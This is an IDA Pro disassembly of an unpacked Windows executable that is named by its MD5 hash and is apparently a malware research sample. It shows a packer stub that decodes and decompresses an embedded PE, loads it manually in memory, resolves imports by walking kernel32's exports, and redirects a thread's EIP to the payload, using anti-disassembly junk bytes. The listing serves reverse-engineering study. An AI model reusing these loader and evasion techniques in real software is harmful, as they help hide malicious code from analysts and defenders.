;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 63616A290A905D7C22FED03D3225715B
; File Name : u:\work\63616a290a905d7c22fed03d3225715b_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 000006DE ( 1758.)
; Section size in file : 00000800 ( 2048.)
; Offset to raw data for section: 00000200
; Flags 60000020: Text Executable Readable
; Alignment : default
;
; Imports from KERNEL32.dll
;
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Externs
; _idata
; HANDLE __stdcall GetCurrentThread()
extrn GetCurrentThread:dword ; CODE XREF: sub_40107E�p
; sub_4015F6+16�p
; DATA XREF: ...
; BOOL __stdcall GetThreadContext(HANDLE hThread,LPCONTEXT lpContext)
extrn GetThreadContext:dword ; CODE XREF: sub_4010A4+10�p
; DATA XREF: sub_4010A4+10�r
; DWORD __stdcall ResumeThread(HANDLE hThread)
extrn ResumeThread:dword ; CODE XREF: sub_4010CE+3�p
; DATA XREF: sub_4010CE+3�r
; BOOL __stdcall SetThreadContext(HANDLE hThread,const CONTEXT *lpContext)
extrn SetThreadContext:dword ; CODE XREF: sub_4010A4+23�p
; DATA XREF: sub_4010A4+23�r
; DWORD __stdcall SuspendThread(HANDLE hThread)
extrn SuspendThread:dword ; CODE XREF: sub_4010CE+C�p
; sub_4015F6+1D�p
; DATA XREF: ...
; HANDLE __stdcall CreateThread(LPSECURITY_ATTRIBUTES lpThreadAttributes,SIZE_T dwStackSize,LPTHREAD_START_ROUTINE lpStartAddress,LPVOID lpParameter,DWORD dwCreationFlags,LPDWORD lpThreadId)
extrn CreateThread:dword ; CODE XREF: sub_40107E+1C�p
; sub_4015F6+10�p
; DATA XREF: ...
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 40101Ch
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
align 10h
; =============== S U B R O U T I N E =======================================
public start
start proc near
push offset loc_40102A
call sub_401060
loc_40102A: ; DATA XREF: start�o
call sub_401142
call sub_401278
call sub_40151C
push dword_402160
call sub_40137D
push eax ; lpStartAddress
push dword_40215C
call sub_40120D
call sub_401406
call loc_4013EB
call sub_4015F6
retn
start endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401060 proc near ; CODE XREF: start+5�p
push ebp
mov ebp, esp
sub esp, 2D4h
push esi
call sub_40107E
call sub_4010A4
call sub_4010CE
pop esi
leave
retn 4
sub_401060 endp
; =============== S U B R O U T I N E =======================================
sub_40107E proc near ; CODE XREF: sub_401060+A�p
call ds:GetCurrentThread
mov [ebp-8], eax
xor eax, eax
mov ecx, 4
lea edx, StartAddress
push eax ; lpThreadId
push ecx ; dwCreationFlags
push eax ; lpParameter
push edx ; lpStartAddress
push eax ; dwStackSize
push eax ; lpThreadAttributes
call ds:CreateThread
mov [ebp-4], eax
retn
sub_40107E endp
; =============== S U B R O U T I N E =======================================
sub_4010A4 proc near ; CODE XREF: sub_401060+F�p
lea esi, [ebp-2D4h]
mov dword ptr [esi], 10002h
push esi ; lpContext
push dword ptr [ebp-4] ; hThread
call ds:GetThreadContext
mov eax, [ebp+8]
mov [esi+0B0h], eax
push esi ; lpContext
push dword ptr [ebp-4] ; hThread
call ds:SetThreadContext
retn
sub_4010A4 endp
; =============== S U B R O U T I N E =======================================
sub_4010CE proc near ; CODE XREF: sub_401060+14�p
push dword ptr [ebp-4] ; hThread
call ds:ResumeThread
push dword ptr [ebp-8] ; hThread
call ds:SuspendThread
sub_4010CE endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION StartAddress. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010E1 proc near ; CODE XREF: sub_401182+19�p
; sub_401278+6A�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
rep movsb
pop edi
pop esi
leave
retn 0Ch
sub_4010E1 endp
; ---------------------------------------------------------------------------
aHeapalloc db 'HeapAlloc',0 ; DATA XREF: sub_401182+B�o
; sub_401182+21�o
aHeapcreate db 'HeapCreate',0
aHeapdestroy db 'HeapDestroy',0
aVirtualalloc db 'VirtualAlloc',0
aGetprocaddress db 'GetProcAddress',0
aLoadlibrarya db 'LoadLibraryA',0
byte_401141 db 0 ; DATA XREF: sub_401182+6�o
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401142 proc near ; CODE XREF: start:loc_40102A�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 4
push esi
call sub_401165
mov [ebp+var_4], eax
call sub_4011CA
mov [ebp+var_8], eax
push eax
push [ebp+var_4]
call sub_401182
pop esi
leave
retn
sub_401142 endp
; =============== S U B R O U T I N E =======================================
sub_401165 proc near ; CODE XREF: sub_401142+7�p
mov cx, 5A4Dh
mov eax, large fs:0
mov eax, [eax+4]
and eax, 0FFFF0000h
loc_401177: ; CODE XREF: sub_401165+1A�j
sub eax, 10000h
cmp [eax], cx
jnz short loc_401177
retn
sub_401165 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401182 proc near ; CODE XREF: sub_401142+1B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov eax, offset byte_401141
mov ecx, offset aHeapalloc ; "HeapAlloc"
sub eax, ecx
push eax
push ecx
push offset dword_402018
call sub_4010E1
mov edi, [ebp+arg_0]
mov esi, offset aHeapalloc ; "HeapAlloc"
mov ebx, offset dword_402000
loc_4011AD: ; CODE XREF: sub_401182+3F�j
push esi
push edi
call [ebp+arg_4]
mov [ebx], eax
add ebx, 4
loc_4011B7: ; CODE XREF: sub_401182+39�j
inc esi
cmp byte ptr [esi], 0
jnz short loc_4011B7
inc esi
cmp byte ptr [esi], 0
jnz short loc_4011AD
pop edi
pop esi
pop ebx
leave
retn 8
sub_401182 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4011CA proc near ; CODE XREF: sub_401142+F�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, eax
add eax, 3Ch
mov eax, [eax]
add eax, 78h
add eax, esi
mov edi, [eax]
add edi, esi
xor ecx, ecx
mov ebx, [edi+20h]
add ebx, esi
loc_4011E7: ; CODE XREF: sub_4011CA+2E�j
mov edx, [ebx]
add edx, esi
cmp dword ptr [edx+4], 41636F72h
jz short loc_4011FA
inc ecx
add ebx, 4
jmp short loc_4011E7
; ---------------------------------------------------------------------------
loc_4011FA: ; CODE XREF: sub_4011CA+28�j
mov edx, [edi+1Ch]
add edx, esi
shl ecx, 2
add edx, ecx
mov eax, [edx]
add eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_4011CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40120D proc near ; CODE XREF: start+2B�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 4
pusha
mov esi, [ebp+arg_0]
mov eax, esi
add eax, 3Ch
mov eax, [eax]
add eax, esi
add eax, 80h
mov ebx, [eax]
add ebx, esi
loc_401229: ; CODE XREF: sub_40120D+62�j
mov eax, [ebx+0Ch]
add eax, [ebp+arg_0]
push eax
call dword_402014
mov [ebp+var_4], eax
mov esi, [ebx]
add esi, [ebp+arg_0]
mov edi, [ebx+10h]
add edi, [ebp+arg_0]
loc_401244: ; CODE XREF: sub_40120D+53�j
mov ecx, [esi]
add ecx, [ebp+arg_0]
inc ecx
inc ecx
push ecx
push [ebp+var_4]
call dword_402010
mov [edi], eax
add esi, 4
add edi, 4
cmp dword ptr [esi], 0
jnz short loc_401244
sub ebx, 2
add ebx, 16h
jmp short loc_40126B
; ---------------------------------------------------------------------------
db 0E8h
; ---------------------------------------------------------------------------
loc_40126B: ; CODE XREF: sub_40120D+5B�j
cmp dword ptr [ebx+0Ch], 0
jnz short loc_401229
xor eax, eax
popa
leave
retn 4
sub_40120D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401278 proc near ; CODE XREF: start+F�p
push ebp
mov ebp, esp
push esi
push ebx
lea eax, dword_402180
and eax, 0FFFF0000h
add eax, 5000h
lea esi, [eax+88h]
mov ecx, [eax+74h]
mov dword_402180, ecx
shl ecx, 3
mov dword_402184, ecx
xor ecx, ecx
push ecx
push ecx
push 1
call dword_402004
mov dword_402168, eax
push dword_402180
push 8
push eax
call dword_402000
mov dword_402178, eax
add eax, dword_402180
mov dword_40217C, eax
push dword_402180
push esi
push dword_402178
call sub_4010E1
push dword_402180
push dword_402178
call sub_4012FE
nop
nop
pop ebx
pop esi
leave
retn
sub_401278 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4012FE proc near ; CODE XREF: sub_401278+7B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov edx, [ebp+arg_0]
mov ecx, [ebp+arg_4]
jmp short loc_40130A
; ---------------------------------------------------------------------------
db 68h
; ---------------------------------------------------------------------------
loc_40130A: ; CODE XREF: sub_4012FE+9�j
; sub_4012FE+11�j
add byte ptr [edx], 3Dh
inc edx
dec ecx
jnz short loc_40130A
add dword_402178, 3
leave
retn 8
sub_4012FE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40131C proc near ; CODE XREF: sub_40151C+5D�p
; sub_40151C+89�p
push ebp
mov ebp, esp
push edi
push esi
push ebx
xor edx, edx
mov ecx, 20h
push dword_402158
mov ebx, dword_402178
pop eax
div ecx
shl eax, 2
add ebx, eax
push dword_402190
pop edi
push edi
mov eax, 0
loc_40134A: ; CODE XREF: sub_40131C+51�j
dec edi
mov esi, [ebx]
bswap esi
mov cl, dl
shl esi, cl
shr esi, 1Fh
test esi, esi
jz short loc_401360
mov ecx, edi
shl esi, cl
add eax, esi
loc_401360: ; CODE XREF: sub_40131C+3C�j
inc edx
cmp edx, 20h
jnz short loc_40136B
add ebx, 4
xor edx, edx
loc_40136B: ; CODE XREF: sub_40131C+48�j
test edi, edi
jnz short loc_40134A
pop ecx
mov edx, ecx
add dword_402158, edx
pop ebx
pop esi
pop edi
leave
retn
sub_40131C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40137D proc near ; CODE XREF: start+1F�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
add ebx, [ebx+3Ch]
mov eax, [ebx+34h]
mov dword_40215C, eax
movzx eax, byte ptr [ebx+6]
mov [ebp+var_4], eax
push 40h
push 3000h
push dword ptr [ebx+50h]
push dword ptr [ebx+34h]
call dword_40200C
mov esi, eax
push dword ptr [ebx+54h]
push [ebp+arg_0]
push esi
call sub_4010E1
lea edi, [ebx+0F8h]
loc_4013C2: ; CODE XREF: sub_40137D+60�j
mov eax, [ebp+arg_0]
add eax, [edi+14h]
mov ecx, esi
add ecx, [edi+0Ch]
push dword ptr [edi+10h]
push eax
push ecx
call sub_4010E1
add edi, 28h
dec [ebp+var_4]
jnz short loc_4013C2
mov eax, [ebx+28h]
add eax, esi
pop edi
pop esi
pop ebx
leave
retn 4
sub_40137D endp
; ---------------------------------------------------------------------------
loc_4013EB: ; CODE XREF: start+35�p
push ebx
xor eax, eax
jz short near ptr loc_4013F0+1
loc_4013F0: ; CODE XREF: .text:004013EE�j
call near ptr 184D9F59h
; ---------------------------------------------------------------------------
db 3 dup(0)
; ---------------------------------------------------------------------------
mov ecx, [ecx+30h]
mov ebx, dword_40215C
mov [ecx+8], ebx
pop ebx
retn
; =============== S U B R O U T I N E =======================================
sub_401406 proc near ; CODE XREF: start+30�p
push dword_40216C
call dword_402008
push dword_402174
call dword_402008
retn
sub_401406 endp
; =============== S U B R O U T I N E =======================================
sub_40141F proc near ; CODE XREF: sub_40151C+4D�p
push ebx
mov ebx, dword_402188
xor ecx, ecx
mov ch, 1
loc_40142A: ; CODE XREF: sub_40141F+18�j
mov [ebx], ch
mov [ebx+1], cl
add ebx, 0A0h
inc cl
jnz short loc_40142A
push ecx
pop dword_40218C
pop ebx
retn
sub_40141F endp
; =============== S U B R O U T I N E =======================================
sub_401442 proc near ; CODE XREF: sub_40151C+CA�p
push ebx
push dword_40218C
push dword_402188
pop ebx
pop eax
mov ecx, 0A0h
mul ecx
add ebx, eax
mov esi, offset dword_402068
movzx ecx, byte ptr [esi]
inc esi
mov [ebx], cl
inc ebx
mov edi, ebx
rep movsb
inc dword_40218C
call sub_401479
pop ebx
nop
retn
sub_401442 endp
; ---------------------------------------------------------------------------
db 0E8h
; =============== S U B R O U T I N E =======================================
sub_401479 proc near ; CODE XREF: sub_401442+2E�p
mov edx, dword_40218C
cmp edx, 200h
jnz short locret_40149B
mov dword_40218C, 100h
mov dword_402190, 9
locret_40149B: ; CODE XREF: sub_401479+C�j
retn
sub_401479 endp
; =============== S U B R O U T I N E =======================================
sub_40149C proc near ; CODE XREF: sub_40151C+70�p
; sub_40151C+B8�p
lea ecx, dword_402068
add ecx, 1
mov al, [ecx]
mov byte_402194, al
retn
sub_40149C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4014AD proc near ; CODE XREF: sub_40151C+66�p
; sub_40151C+9F�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
pusha
mov edi, offset dword_402068
mov eax, [ebp+arg_0]
mov ebx, dword_402188
mov ecx, 0A0h
mul ecx
add ebx, eax
movzx ecx, byte ptr [ebx]
inc ecx
mov esi, ebx
rep movsb
popa
leave
retn 4
sub_4014AD endp
; =============== S U B R O U T I N E =======================================
sub_4014D5 proc near ; CODE XREF: sub_40151C+A4�p
; sub_40151C+C5�p
push ebx
mov ebx, offset dword_402068
inc byte ptr [ebx]
movzx ecx, byte ptr [ebx]
add ebx, ecx
mov al, byte_402194
mov [ebx], al
pop ebx
retn
sub_4014D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4014EB proc near ; CODE XREF: sub_40151C+6B�p
; sub_40151C:loc_4015CF�p
push ebp
mov ebp, esp
pusha
mov edi, dword_402160
add edi, dword_402164
mov esi, offset dword_402068
movzx ecx, byte ptr [esi]
add dword_402164, ecx
inc esi
rep movsb
popa
leave
retn
sub_4014EB endp
; ---------------------------------------------------------------------------
aLoadlibrarya_0 db 'LoadLibraryA',0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40151C proc near ; CODE XREF: start+14�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
push ebx
xor ebx, ebx
push ebx
push ebx
push 1
call dword_402004
mov dword_40216C, eax
push 0EA60h
push 8
push eax
call dword_402000
mov dword_402160, eax
push ebx
push ebx
push 1
call dword_402004
mov dword_402174, eax
push 0C35000h
push 8
push eax
call dword_402000
mov dword_402188, eax
call sub_40141F
mov eax, 0Ah
dec eax
mov dword_402190, eax
call sub_40131C
mov [ebp+var_8], eax
push eax
call sub_4014AD
call sub_4014EB
call sub_40149C
loc_401591: ; CODE XREF: sub_40151C+D5�j
mov edx, dword_402184
sub edx, dword_402158
cmp edx, dword_402190
jl short loc_4015F3
call sub_40131C
mov [ebp+var_4], eax
mov ebx, dword_40218C
dec ebx
cmp eax, ebx
jle short loc_4015C7
push [ebp+var_8]
call sub_4014AD
call sub_4014D5
jmp short loc_4015CF
; ---------------------------------------------------------------------------
loc_4015C7: ; CODE XREF: sub_40151C+9A�j
push [ebp+var_4]
call sub_4014AD
loc_4015CF: ; CODE XREF: sub_40151C+A9�j
call sub_4014EB
call sub_40149C
push [ebp+var_8]
call sub_4014AD
call sub_4014D5
call sub_401442
mov eax, [ebp+var_4]
mov [ebp+var_8], eax
jmp short loc_401591
; ---------------------------------------------------------------------------
loc_4015F3: ; CODE XREF: sub_40151C+87�j
pop ebx
leave
retn
sub_40151C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_4015F6(LPTHREAD_START_ROUTINE lpStartAddress)
sub_4015F6 proc near ; CODE XREF: start+3A�p
lpStartAddress = dword ptr 8
push ebp
mov ebp, esp
push 0 ; lpThreadId
push 0 ; dwCreationFlags
push 0 ; lpParameter
push [ebp+lpStartAddress] ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread
call ds:GetCurrentThread
push eax ; hThread
call ds:SuspendThread
leave
retn 4
sub_4015F6 endp
; ---------------------------------------------------------------------------
align 10h
dd 1648h, 2 dup(0)
dd 16D0h, 1000h, 5 dup(0)
dd 1674h, 1688h, 169Ch, 16ACh, 16C0h, 1664h, 0
dd 72430048h, 65746165h, 65726854h, 6461h, 654700E5h, 72754374h
dd 746E6572h, 65726854h, 6461h, 65470152h, 72685474h, 43646165h
dd 65746E6Fh, 7478h, 6552020Fh, 656D7573h, 65726854h, 6461h
dd 65530263h, 72685474h, 43646165h, 65746E6Fh, 7478h, 75530275h
dd 6E657073h, 72685464h, 646165h, 4E52454Bh, 32334C45h
dd 6C6C642Eh, 49h dup(0)
_text ends
; Section 2. (virtual address 00002000)
; Virtual size : 000020D5 ( 8405.)
; Section size in file : 00000000 ( 0.)
; Offset to raw data for section: 00000000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 402000h
dword_402000 dd ? ; DATA XREF: sub_401182+26�o
; sub_401278+47�r ...
dword_402004 dd ? ; DATA XREF: sub_401278+33�r
; sub_40151C+D�r ...
dword_402008 dd ? ; DATA XREF: sub_401406+6�r
; sub_401406+12�r
dword_40200C dd ? ; DATA XREF: sub_40137D+2B�r
dword_402010 dd ? ; DATA XREF: sub_40120D+42�r
dword_402014 dd ? ; DATA XREF: sub_40120D+23�r
dword_402018 dd 14h dup(?) ; DATA XREF: sub_401182+14�o
dword_402068 dd 3Ch dup(?) ; DATA XREF: sub_401442+18�o
; sub_40149C�o ...
dword_402158 dd ? ; DATA XREF: sub_40131C+D�r
; sub_40131C+56�w ...
dword_40215C dd ? ; DATA XREF: start+25�r sub_40137D+12�w ...
dword_402160 dd ? ; DATA XREF: start+19�r sub_4014EB+4�r ...
dword_402164 dd ? ; DATA XREF: sub_4014EB+A�r
; sub_4014EB+18�w
dword_402168 dd ? ; DATA XREF: sub_401278+39�w
dword_40216C dd ? ; DATA XREF: sub_401406�r
; sub_40151C+13�w
dd ?
dword_402174 dd ? ; DATA XREF: sub_401406+C�r
; sub_40151C+35�w
dword_402178 dd ? ; DATA XREF: sub_401278+4D�w
; sub_401278+64�r ...
dword_40217C dd ? ; DATA XREF: sub_401278+58�w
dword_402180 dd ? ; DATA XREF: sub_401278+5�o
; sub_401278+1E�w ...
dword_402184 dd ? ; DATA XREF: sub_401278+27�w
; sub_40151C:loc_401591�r
dword_402188 dd ? ; DATA XREF: sub_40141F+1�r
; sub_401442+7�r ...
dword_40218C dd ? ; DATA XREF: sub_40141F+1B�w
; sub_401442+1�r ...
dword_402190 dd ? ; DATA XREF: sub_40131C+21�r
; sub_401479+18�w ...
byte_402194 db ? ; DATA XREF: sub_40149C+B�w
; sub_4014D5+D�r
align 4
dd 7CFh dup(?)
db ?
_data ends
end start